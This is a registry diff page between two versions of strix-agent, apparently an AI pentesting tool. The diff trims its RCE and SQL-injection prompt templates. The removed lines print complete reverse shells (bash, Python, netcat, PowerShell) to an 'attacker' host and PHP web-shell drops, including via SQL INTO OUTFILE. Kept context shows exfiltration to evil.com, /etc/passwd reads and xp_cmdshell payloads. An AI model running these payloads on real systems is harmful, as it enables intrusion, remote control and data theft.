strix-agent 0.1.14__py3-none-any.whl → 0.1.15__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of strix-agent might be problematic. Click here for more details.

@@ -59,7 +59,7 @@ ${IFS}id
59
59
 
60
60
  <language_specific_rce>
61
61
  <php>
62
- - eval($_GET['cmd'])
62
+ - eval() with user input
63
63
  - system(), exec(), shell_exec(), passthru()
64
64
  - preg_replace with /e modifier
65
65
  - assert() with string input
@@ -101,7 +101,7 @@ Works in multiple contexts:
101
101
  - DNS exfiltration: $(whoami).evil.com
102
102
  - HTTP callbacks: curl evil.com/$(id)
103
103
  - Time delays for boolean extraction
104
- - Write to web root: echo '<?php system($_GET["cmd"]); ?>' > /var/www/shell.php
104
+ - Write to web root
105
105
  </blind_rce>
106
106
 
107
107
  <chained_exploitation>
@@ -163,22 +163,6 @@ concat:|file:///etc/passwd
163
163
  - Path traversal: /usr/bin/id vs id
164
164
  </waf_bypasses>
165
165
 
166
- <post_exploitation>
167
- <reverse_shells>
168
- Bash: bash -i >& /dev/tcp/attacker/4444 0>&1
169
- Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
170
- Netcat: nc -e /bin/sh attacker 4444
171
- PowerShell: $client = New-Object System.Net.Sockets.TCPClient("attacker",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
172
- </reverse_shells>
173
-
174
- <persistence>
175
- - Cron jobs
176
- - SSH keys
177
- - Web shells
178
- - Systemd services
179
- </persistence>
180
- </post_exploitation>
181
-
182
166
  <validation>
183
167
  To confirm RCE:
184
168
  1. Execute unique command (id, hostname)
@@ -82,7 +82,6 @@ PostgreSQL:
82
82
  <file_operations>
83
83
  MySQL:
84
84
  ' UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
85
- ' UNION SELECT 1,2,'<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'--
86
85
 
87
86
  MSSQL:
88
87
  '; EXEC xp_cmdshell 'type C:\Windows\win.ini'--
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.3
2
2
  Name: strix-agent
3
- Version: 0.1.14
3
+ Version: 0.1.15
4
4
  Summary: Open-source AI Hackers for your apps
5
5
  License: Apache-2.0
6
6
  Keywords: cybersecurity,security,vulnerability,scanner,pentest,agent,ai,cli
@@ -39,8 +39,8 @@ strix/prompts/vulnerabilities/business_logic.jinja,sha256=pazAYPIduxcnTyn0rDJj7n
39
39
  strix/prompts/vulnerabilities/csrf.jinja,sha256=CiwzG5UFT8SEt9jlEfSU4gJvonrVSDlaiZ1ff9eYE_0,4451
40
40
  strix/prompts/vulnerabilities/idor.jinja,sha256=tpk74gFvrkO2pcPeBB5BpZ2-ZusbU4X-XxFFd5SYvbM,4408
41
41
  strix/prompts/vulnerabilities/race_conditions.jinja,sha256=31aKYDqL50v5SP2keS2Gj7cTBuF3WhKIs2DKsZNezSI,4869
42
- strix/prompts/vulnerabilities/rce.jinja,sha256=VPkQR4vHNDph_u_wWfQKyercq9jMpn8xTWr1k-ybPck,5813
43
- strix/prompts/vulnerabilities/sql_injection.jinja,sha256=xdcasdmd80zX7qpd9bu3Hn1BKD4qp1NEcq5yP-OgLTc,5700
42
+ strix/prompts/vulnerabilities/rce.jinja,sha256=-V6bexL6vjtNp34z9x_MafoguC0NNEI4hU_CCbamm5I,4776
43
+ strix/prompts/vulnerabilities/sql_injection.jinja,sha256=pN6QSynbsmV81gkNguj59VeEtJoVlPqgKg_8xkqPunY,5614
44
44
  strix/prompts/vulnerabilities/ssrf.jinja,sha256=MfRs3MtvgAEauaOrCHpKIoRnS0YCZKyCDaIb_xm5EWA,4440
45
45
  strix/prompts/vulnerabilities/xss.jinja,sha256=rVD25fOYxeVgd6k-7eePkzADxCi2XopPSSNPd4J9NWg,6202
46
46
  strix/prompts/vulnerabilities/xxe.jinja,sha256=hZ_SlrQQPsDWN2UF4VhIhpXIDAK66su055uEpgAdt5Y,7102
@@ -92,8 +92,8 @@ strix/tools/thinking/thinking_actions_schema.xml,sha256=otD4dOhQx4uyudLnjA_HIP6E
92
92
  strix/tools/web_search/__init__.py,sha256=m5PCHXqeNVraLRLNIbh54Z2N4Y_75d-ftqwyq3dbCd0,70
93
93
  strix/tools/web_search/web_search_actions.py,sha256=LRS3AjGO4JLIyu_B6-ogfWOsnENwqrrCa8Rz0vxuuGQ,3107
94
94
  strix/tools/web_search/web_search_actions_schema.xml,sha256=Ihc3Gv4LaPI_MzBbwZOt3y4pwg9xmtl8KfPNvFihEP4,4805
95
- strix_agent-0.1.14.dist-info/LICENSE,sha256=fblpcTQlHjFL2NOSV_4XDJiz4q2bLtZ-l6yvlhPnueM,11345
96
- strix_agent-0.1.14.dist-info/METADATA,sha256=GGgCJg59cRXdTZN7R7122AxtvJtSuATPjkDP2Gz7BbQ,6139
97
- strix_agent-0.1.14.dist-info/WHEEL,sha256=RaoafKOydTQ7I_I3JTrPCg6kUmTgtm4BornzOqyEfJ8,88
98
- strix_agent-0.1.14.dist-info/entry_points.txt,sha256=sswIgnkzSVSzQ3Rd046g7mhIPQaj_7RYlXgU_bQelF0,45
99
- strix_agent-0.1.14.dist-info/RECORD,,
95
+ strix_agent-0.1.15.dist-info/LICENSE,sha256=fblpcTQlHjFL2NOSV_4XDJiz4q2bLtZ-l6yvlhPnueM,11345
96
+ strix_agent-0.1.15.dist-info/METADATA,sha256=1eyZvOFtWwZZgb5HcFn48VY4U-4_8yaiD2e_BIsb5zc,6139
97
+ strix_agent-0.1.15.dist-info/WHEEL,sha256=RaoafKOydTQ7I_I3JTrPCg6kUmTgtm4BornzOqyEfJ8,88
98
+ strix_agent-0.1.15.dist-info/entry_points.txt,sha256=sswIgnkzSVSzQ3Rd046g7mhIPQaj_7RYlXgU_bQelF0,45
99
+ strix_agent-0.1.15.dist-info/RECORD,,